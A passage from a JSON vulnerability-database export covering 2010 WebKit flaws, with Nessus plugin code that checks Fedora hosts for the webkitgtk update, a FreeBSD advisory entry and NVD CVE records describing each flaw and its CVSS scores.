os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"webkitgtk-1.2.4-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:07:59", "description": "Update to 1.2.4 which fixes: CVE-2010-1780 CVE-2010-1782 CVE-2010-1784\nCVE-2010-1785 CVE-2010-1786 CVE-2010-1787 CVE-2010-1788 CVE-2010-1790\nCVE-2010-1792 CVE-2010-1793 CVE-2010-2648 Update to 1.2.3 which fixes:\nCVE-2010-1386 CVE-2010-1392 CVE-2010-1405 CVE-2010-1407 CVE-2010-1416\nCVE-2010-1417 CVE-2010-1665 CVE-2010-1418 CVE-2010-1421 CVE-2010-1422\nCVE-2010-1501 CVE-2010-1767 CVE-2010-1664 CVE-2010-1758 CVE-2010-1759\nCVE-2010-1760 CVE-2010-1761 CVE-2010-1762 CVE-2010-1770 CVE-2010-1771\nCVE-2010-1772 CVE-2010-1773 CVE-2010-1774 CVE-2010-2264\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2010-09-16T00:00:00", "title": "Fedora 13 : webkitgtk-1.2.4-1.fc13 (2010-14409)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1783", "CVE-2010-1758", "CVE-2010-1787", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1780", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1786", "CVE-2010-1773", "CVE-2010-1785", "CVE-2010-1501", "CVE-2010-2648", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1790", "CVE-2010-1788", "CVE-2010-1761", "CVE-2010-1782", "CVE-2010-1665", "CVE-2010-1792", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1784", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421", "CVE-2010-1793"], "modified": "2010-09-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:13", "p-cpe:/a:fedoraproject:fedora:webkitgtk"], "id": "FEDORA_2010-14409.NASL", "href": "https://www.tenable.com/plugins/nessus/49246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-14409.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49246);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1772\", \"CVE-2010-1773\", \"CVE-2010-1780\", \"CVE-2010-1782\", \"CVE-2010-1783\", \"CVE-2010-1784\", \"CVE-2010-1785\", \"CVE-2010-1786\", \"CVE-2010-1787\", \"CVE-2010-1788\", \"CVE-2010-1790\", \"CVE-2010-1792\", \"CVE-2010-1793\");\n script_bugtraq_id(41573, 41575, 42034, 42035, 42036, 42037, 42038, 42041, 42042, 42043, 42044, 42046, 42049);\n script_xref(name:\"FEDORA\", value:\"2010-14409\");\n\n script_name(english:\"Fedora 13 : webkitgtk-1.2.4-1.fc13 (2010-14409)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.2.4 which fixes: CVE-2010-1780 CVE-2010-1782 CVE-2010-1784\nCVE-2010-1785 CVE-2010-1786 CVE-2010-1787 CVE-2010-1788 CVE-2010-1790\nCVE-2010-1792 CVE-2010-1793 CVE-2010-2648 Update to 1.2.3 which fixes:\nCVE-2010-1386 CVE-2010-1392 CVE-2010-1405 CVE-2010-1407 CVE-2010-1416\nCVE-2010-1417 CVE-2010-1665 CVE-2010-1418 CVE-2010-1421 CVE-2010-1422\nCVE-2010-1501 CVE-2010-1767 CVE-2010-1664 CVE-2010-1758 CVE-2010-1759\nCVE-2010-1760 CVE-2010-1761 CVE-2010-1762 CVE-2010-1770 CVE-2010-1771\nCVE-2010-1772 CVE-2010-1773 CVE-2010-1774 CVE-2010-2264\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=606303\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=606304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=615728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=615729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=631583\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-September/047699.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b197765a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"webkitgtk-1.2.4-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:06", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1416", "CVE-2010-1417", "CVE-2010-1760", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1407", "CVE-2010-1772", "CVE-2010-1664", "CVE-2010-1759", "CVE-2010-1773", "CVE-2010-1501", "CVE-2010-1774", "CVE-2010-2264", "CVE-2010-1418", "CVE-2010-1761", "CVE-2010-1665", "CVE-2010-1422", "CVE-2010-1767", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1762", "CVE-2010-1386", "CVE-2010-1405", "CVE-2010-1421"], "description": "\nGustavo Noronha reports:\n\nDebian's Michael Gilbert has done a great job going through all\n\t CVEs released about WebKit, and including patches in the Debian\n\t package. 1.2.3 includes all of the commits from trunk to fix those,\n\t too.\n\n", "edition": 4, "modified": "2010-07-16T00:00:00", "published": "2010-07-16T00:00:00", "id": "19419B3B-92BD-11DF-B140-0015F2DB7BDE", "href": "https://vuxml.freebsd.org/freebsd/19419b3b-92bd-11df-b140-0015f2db7bde.html", "title": "webkit-gtk2 -- Multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:34:38", "description": "Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG document that contains recursive Use elements, which are not properly handled during page deconstruction.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1404", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1404"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1404", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:39", "description": "Use-after-free vulnerability in Apple Safari before 5.0 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper window management.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1750", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1750"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1750", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1750", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:38", "description": "WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via an SVG document with nested use elements.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1410", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1410"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1410", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1410", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:38", "description": "Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML document fragments.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1394", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1394"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1394", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1394", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:38", "description": "Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the removeChild DOM method.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1414", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1414"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1414", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1414", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:40", "description": "The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document.", "edition": 5, "cvss3": {}, "published": "2010-06-11T19:30:00", "title": "CVE-2010-2264", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2264"], "modified": "2011-03-18T02:50:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-2264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:38", "description": "WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during the handling of a use element in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted document containing XML that triggers a parsing error, related to ProcessInstruction.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1403", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1403"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1403", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1403", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:38", "description": "The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to discover sensitive URLs via an HREF attribute associated with a redirecting URL.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1393", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1393"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1393", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:34:38", "description": "WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2010-06-11T18:00:00", "title": "CVE-2010-1413", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1413"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:4.0.5", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:webkit:*", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:4.0.4", "cpe:/a:apple:safari:4.0.3", "cpe:/a:apple:safari:4.0.0b"], "id": "CVE-2010-1413", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1413", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:webkit:*:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.0b:*:*:*:*:*:*:*"]}, {"lastseen": 